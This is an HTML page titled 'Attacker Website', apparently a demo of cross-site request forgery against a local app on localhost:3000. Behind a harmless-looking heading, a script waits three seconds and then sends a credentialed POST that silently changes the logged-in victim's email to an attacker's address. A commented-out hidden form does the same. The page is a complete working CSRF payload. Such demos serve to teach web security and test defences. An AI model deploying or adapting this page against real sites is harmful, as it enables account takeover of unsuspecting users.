<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Attacker Website</title>
  </head>
  <body>
    <h1>Some nice website</h1>

    <!-- <form action="http://localhost:3000/edit" method="POST">
      <input type="hidden" name="email" value="hacker@hacker.com" />
    </form> -->

    <script>
      window.setTimeout(() => {
        // document.forms[0].submit();

        fetch('http://localhost:3000/edit', {
          method: 'POST',
          credentials: 'include',
          mode: 'no-cors',
          headers: {
            'Content-Type': 'application/x-www-form-urlencoded'
          },
          body: 'email=hacker@hacker.com'
        })
        .then(res => res.text())
        .then(text => console.log(text))
        .catch(err => console.log(err));
      }, 3000);
    </script>
  </body>
</html>